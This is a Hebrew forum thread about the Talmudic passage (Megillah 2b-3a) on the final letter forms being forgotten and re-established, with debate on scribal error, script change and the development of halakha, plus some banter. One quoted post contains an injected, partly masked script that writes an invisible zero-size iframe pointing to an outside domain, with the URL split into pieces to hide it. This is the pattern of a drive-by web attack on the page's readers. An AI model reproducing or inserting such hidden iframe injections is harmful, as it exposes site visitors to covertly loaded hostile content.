| נשלח ב-26/2/2015 16:50 |
|
| |
מנצפ"ך שכחום וחזרו ויסדום. איך שכחום?
בבלי מגילה ב:-ג. "אמר רבי ירמיה ואיתימא רבי חייא בר אבא מנצפ"ך צופים אמרום ותסברא והכתיב (ויקרא כז, לד) אלה המצות שאין נביא רשאי לחדש דבר מעתה ועוד האמר רב חסדא מ"ם וסמ"ך שבלוחות בנס היו עומדין אין מהוה הוו ולא הוו ידעי הי באמצע תיבה והי בסוף תיבה ואתו צופים ותקינו פתוחין באמצע תיבה וסתומין בסוף תיבה סוף סוף אלה המצות שאין נביא עתיד לחדש דבר מעתה אלא שכחום וחזרו ויסדום". וכאן שואל הבן- בהנחה שהיו להם ספרי תורה, ובכמות המתאימה לעם שלם, לא אחד ולא שניים, איך שכחום והרי תורה מלאה בפתוחות וסתומות? ואם נניח שנשתכחו הרי השיכחה היא קולוסאלית ואיזה ערך יש לדביקות הקנאית בנוסח התורה. מי ערב לנו שבאירוע השיכחה לא נשכח עוד הרבה? כוון אפשרי לתשובה הוא שהשיכחה היתה עם החלפת הכתב בידי עזרא. אבל מהגמ' משמע כי גם בכתב המקורי (שבלוחות...) היה הבדל בין פתוחות וסגורות ואם כן היה ההבדל צריך לבוא לביטוי בהעתקה לכתב אשורי ושינוי הכתב לא יתן לנו מאומה. אלא אם תאמר שבתחילה לא היה הבדל בכתב האשורי ויסדו שיהיה (במקביל לכתב המקורי) או שהעתיקו לספר אחד אשורית וממנו באו השאר והמעתיק לא יחס חשיבות להבדל. הסברים אלו דחוקים. יבואו המבינים ויסבירו.
 |
|
|
|
|
| נשלח ב-19/10/2015 08:06 |
|
| |
| מיימוני כתב: |  |
אפשר לנסות להחיל את הרעיון הזה על תולדות ההלכה. כמובן, כאן אני מעז לטעון שיש התפתחות במסורת, טענה שלא העליתי בדעתי לטעון בראשית ימי בפורום. אבל כמדומה שזה לא חסרון להודות על האמת הזו.
הנה כמה דוגמאות, חלקן לקוחות ממנהגים וחלקן מהלכות שיש להן יותר מקור בתלמוד.
א. כמה פעמים יש לכרוך את הרצועות של התפילין של יד על הזרוע? שימו לב שהרמב"ם עד כמה שאני מכיר אינו מזכיר כלל חובה כזו. אני משער שהקורא נוהג שבע פעמים. מדוע שבע?
ב. אם הכתב הקדמון האשורי איפשר תחילה לכתוב כל אחד משני המ"מים, ובשלב כלשהו התקבלה אבחנה, זה בראש וזה בתחילה, זה יכול להסביר את הנתונים. זו דוגמא לעקרון שכתבתי, של "קבלת צורה מסויימת".
התלמוד יתקשה כמובן לקבל שפעם דבר היה לא סגור והיום הוא קיבל צורה, ולכן הוא מעדיף את ההשערה החליפית שהיתה דרך מסויימת אבל היא נשכחה. (ועקרונית, ודאי שגם תהליך כזה מתרחש).
< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
|
|
כהמשך למה שכתבתי לעיל איני בטוח כי אכן התלמוד יתקשה לקבל התפתחות כזאת (יש הרבה בתלמוד איסורים ותקנות שתיקנו אנשים ספציפיים למקומות מסוימים והתקבלו איכשהו לתמיד)
וקושית התלמוד היתה רק על מנצפך צופים אמרום שזה נשמע שהנביאים (צופים) חידשו את זה בנבואה, ועל זה הקשה התלמוד "והלא אין נביא רשאי לחדש דבר מעתה" ועל זה אמר שכחום אבל לו היה נאמר שנהגו כן במהלך הדורות יתכו ולא היה לתלמוד שום בעיה עם זה
|
|
|
|
| נשלח ב-19/10/2015 08:00 |
|
| |
מה שכתבת מיימוני מעלה שאלה מעניינת האם החלוקה הרגילה שלנו למצוות התורה למצוות דאורייתא ודרבנן וזהו היא החלוקה האופטימלית או שמא ישנן תת חלוקות. דאורייתא גמורה, דרבנן, דברים שחייבים לעשות כי זה מה שטוב לקהילה,דברים שהונהגו במהלך הדורות וכו' וכו' (ברוח מה שכתבת בחמורו של בורדיאן. ואולי באמת ר' גדליה הניח כהנחה אקסיומטית שלא כל מה שנאמר בגמ' או בהלכה הוא דין של ממש), והתפתחות זו תיתכן בהחלט בהלכה ואינה סתירה לתורה שלימה מן השמים. ואין שונה הדבר מאיסורים דרבנן שאינם סתירה לקבלת התורה בשלמותה.
|
|
|
|
| נשלח ב-18/10/2015 09:53 |
|
| |
פאנאט
ברוך הבא אל הפורום!
הנושא שבאשכול הוא חשוב מאד. ויתכן שמה שאני כותב כאן כבר כתבתי פעם. אבל מה יש. אפשר לחזור.
בקצרה, וללא הוכחות:
ניתן להעלות השערה עקרונית לגבי מעשים וטכסים אנושיים שהם הולכים ומקבלים צורה מסויימת, כזו ולא אחרת, ומה שהיה פעם אפשרות פתוחה הופך להיות טכס סגור שאפשר לעשותו רק כך ולא אחרת.
זו טענה לגבי טכסים וצורות התנהגות מקבילות, שניתן לבדוק אותה מול ההיסטוריה של צורות התנהגות וטכסים בחברות שונות.
אין בידי לבדוק את ההשערה הזו, אבל אני כן יכול להציע מה הן הנחות היסוד שלה ואז לבדוק אותה מול המקורות שלנו.
הנחות היסוד הן שאפשר להחיל את הרעיון של התפתחות על תופעות אנושיות תרבותיות. (האנושות מתקדמת, ויש היום גם טכנולוגיה). שנית, בני אדם בוחנים גבולות ומפתחים מודעות. לכן כאשר יש טכס, במובן של צורת התנהגות שאין לה ערך אלא בתוך עצמה, משום שהיא חלק ממסורת, הטכס הזה עשוי לקבל צורה עוד יותר מסויימת של כך ולא אחרת. נניח, שאם היה חוק לתלות דגל, החוק היה צריך להגדיר מהו דגל, מי תולה אותו, ממתי עד מתי, וכו'. בעוד שהדגל לפני הנצחתו בחוק כתוב היה יכול להיות יותר גמיש. זו רק דוגמא אז אם טעיתי באיזה מקום, הסתכלו על הרעיון ולא על הדיוק ביישום.
אפשר לנסות להחיל את הרעיון הזה על תולדות ההלכה. כמובן, כאן אני מעז לטעון שיש התפתחות במסורת, טענה שלא העליתי בדעתי לטעון בראשית ימי בפורום. אבל כמדומה שזה לא חסרון להודות על האמת הזו.
הנה כמה דוגמאות, חלקן לקוחות ממנהגים וחלקן מהלכות שיש להן יותר מקור בתלמוד.
א. כמה פעמים יש לכרוך את הרצועות של התפילין של יד על הזרוע? שימו לב שהרמב"ם עד כמה שאני מכיר אינו מזכיר כלל חובה כזו. אני משער שהקורא נוהג שבע פעמים. מדוע שבע?
ב. אם הכתב הקדמון האשורי איפשר תחילה לכתוב כל אחד משני המ"מים, ובשלב כלשהו התקבלה אבחנה, זה בראש וזה בתחילה, זה יכול להסביר את הנתונים. זו דוגמא לעקרון שכתבתי, של "קבלת צורה מסויימת".
התלמוד יתקשה כמובן לקבל שפעם דבר היה לא סגור והיום הוא קיבל צורה, ולכן הוא מעדיף את ההשערה החליפית שהיתה דרך מסויימת אבל היא נשכחה. (ועקרונית, ודאי שגם תהליך כזה מתרחש).
|
|
|
|
| נשלח ב-14/10/2015 18:47 |
|
| |
צפיתי בריטב"א (מגילה ג:) והוא אכן כותב הטעות היתה בין מה באמצע למה בסוף. אך אינו מקשה את הרושיה הנ"ל אלא קושיה אחרת אבל עדיין מכאן ועד לומר שפשוט היו קצת סופרים שטעו במשך השנים ובלבלו את כולם, כי היו פתאום ספרי תורה שונים הדרך קצרה ואין כאן שום קושיה (והרוצה להרחיב יוכל להסתכל שם בריטב"א שדן האם תורה ניתנה בכתב עברי ועזרא שינה לאשורי עפ"י רוח הקודש או שניתנה מראש באשורי)
|
|
|
|
| נשלח ב-14/10/2015 16:19 |
|
| |
"פאנאט אם על ספר כתוב לא ניתן לסמוך, איך תסמוך על מסורת בע"פ?"
כאשר המוסרת משכנעת אותך בצורה הגיונית ומתקבלת על הדעת. שהרי ההגיון הוא הוא שאמור להכתיב את התנהלותנו.
|
|
|
|
| נשלח ב-14/10/2015 12:01 |
|
| |
פאנאט אם על ספר כתוב לא ניתן לסמוך, איך תסמוך על מסורת בע"פ?
|
|
|
|
| נשלח ב-14/10/2015 10:00 |
|
| |
| תלמידטועה כתב: |  | בבלי מגילה ב:-ג. "אמר רבי ירמיה ואיתימא רבי חייא בר אבא מנצפ"ך צופים אמרום ותסברא והכתיב (ויקרא כז, לד) אלה המצות שאין נביא רשאי לחדש דבר מעתה ועוד האמר רב חסדא מ"ם וסמ"ך שבלוחות בנס היו עומדין אין מהוה הוו ולא הוו ידעי הי באמצע תיבה והי בסוף תיבה ואתו צופים ותקינו פתוחין באמצע תיבה וסתומין בסוף תיבה סוף סוף אלה המצות שאין נביא עתיד לחדש דבר מעתה אלא שכחום וחזרו ויסדום". וכאן שואל הבן- בהנחה שהיו להם ספרי תורה, ובכמות המתאימה לעם שלם, לא אחד ולא שניים, איך שכחום והרי תורה מלאה בפתוחות וסתומות? ואם נניח שנשתכחו הרי השיכחה היא קולוסאלית ואיזה ערך יש לדביקות הקנאית בנוסח התורה. מי ערב לנו שבאירוע השיכחה לא נשכח עוד הרבה?. |
| נאמר לי (לא ראיתי בפנים) כי הריטב"א שואל שאלה זו והוא עונה בפשיטות כיבמהלך הדורות היו סופרים שטעו וכתבו אותיות סופיות באמצע או שאינן סופיות בסוף בלי שוםפ סדר ושכחו האם אכן יש סדר בדווקא למה באמצע ומה בסוף ואלו מסוג הטעויות שקרו הרבה במסורה. (תפילין של רש"י ור"ת וכו')
|
|
|
|
| נשלח ב-13/4/2015 00:26 |
|
| |
אני ממש מתנצל על כך שאני מחזיר את הנושא שבכותרת הפורום, זה פשוט מעניין אותי. כמדומני שהנושא השורשי שראוי לדון עליו, הוא האם דרך העתקת המסורת המדויקת שקיימת היום בעם ישראל, הייתה קיימת לאורך כל הדורות. אין חולק שיש גישות שונות בכל דור, יש שמרנים יותר ופחות, דייקנים יותר ופחות וכדמה. המדובר הוא האם יכול להיות שרווחה בעם התייחסות שונה מן הקצה לקצה לדת, למצוותיה ולספריה. נקודה זו עוברת כחוט השני בכל דיון ענייני על כללי ופרטי התורה שבעל פה, ומסירת התורה בכלל. מן הראוי היה לייחד לנושא זה אשכול נפרד, והייתי שמח לנסות להביא שם רשימת מקורות, אבל אני עדיין חדש כאן, אולי בהמשך...
|
|
|
|
| נשלח ב-12/4/2015 10:35 |
|
| |
אמרו חזלי"נו: השיבולי והטיפקס ירדו לעולם כרוכים זה בזה, כל מקום שאתה מוצא שיבולי משתחל לפורומין, הטיפקס בא אחריו. יבא המנהל שאישר כתיבתו ויקנח את הסרח העודף. וכפי שאמר הפילוסוף ההומנידי המפורסם הומו ארקטוס: "בניאדרטל תהיה ניאדרטלי", מצוטט בספרה של הוגת הדעות המוערכת לוסי-אפריקנוס בחיבורה רב המכר "50 גוונים של אבני צור", כשהיא מוסיפה: "אם מחרפים אותך בכתב חרטומים, חרוט תגובה נאה בכתב יתדות, והראה לו מהיכן משפריץ האזמל". מצוטט ע"י הזכר אלפא הנודע הומו-הומו-פילבחדרוס במצבת הנצחון שלו 'עלילות שיבולמש'.
|
|
|
|
| נשלח ב-12/4/2015 10:19 |
|
| |
יש הנאה מסויימת מלצפות בויכוח בין שני ציניקאנים חדי לשון (או יותר).
אבל יש גבול לכל תענוג.
יש להתייחס לנושאים ולא לאומרים.
בבקשה לא להטריח את בעל הטיפקס.
|
|
|
|
|
| נשלח ב-12/4/2015 10:17 |
|
| |
ידוע שכל המתרחש בעולמנו יש לו שורש בעליונים, ואחר חיפוש בספרים הקדושים מצאתי סו"ס את שורש נשמתו של מוהר"ר הבסד"ה שעילט"א, והוא הצדיק הידוע סייקס מזקני לונדון במאה ה18, וכך מתאר אותו מרן הדיקעאנס זצ"ל:
"תבשיל זה חילץ מסייקס כמה הערות מרושעות על צאן טבוח שכן היה שרוי במצב רוח מרומם ושש לצאת לשוד. על כל פנים גם את הבירה הוא גמע בלגימה אחת צוהלת, ובמהלך הארוחה כולה לא השמיע יותר משבעים ושש קללות – על פי אומדן גס". (צ'ארלס דיקנס, 'אוליבר טויסט', פרק 20).
|
|
|
|
| נשלח ב-12/4/2015 08:22 |
|
| |
איזה יופי! סוף סוף דיון מלומד של אינטלקטואלים דתיים בנושא הראוי להם והם לו.
|
|
|
|
| נשלח ב-11/4/2015 23:26 |
|
| |
תוקן על ידי עצכח ב- 12/04/2015 10:17:19
|
|
|
|
| נשלח ב-11/4/2015 23:14 |
|
| |
תוקן על ידי עצכח ב- 12/04/2015 10:16:41
|
|
|
|
| נשלח ב-11/4/2015 23:03 |
|
| |
אגב, חשבתי לפענח את סימן השירותים בשני אפסים, במקומות ציבוריים כמו בתי מלון אכסניות פנימיות שהחדרים ממוספרים ב01 02 03 וכו' החדר הראשון מוספר ב00 ובו היה השירותים. אשמח אם אחד ההיסטוריונים דכאן יעזור לי לאשש השערה מכובדת זו. ובפרט המומחה לעניני שירותים הרה"ג בסד"ה יחוה דעתו המלומדת.
|
|
|
|
|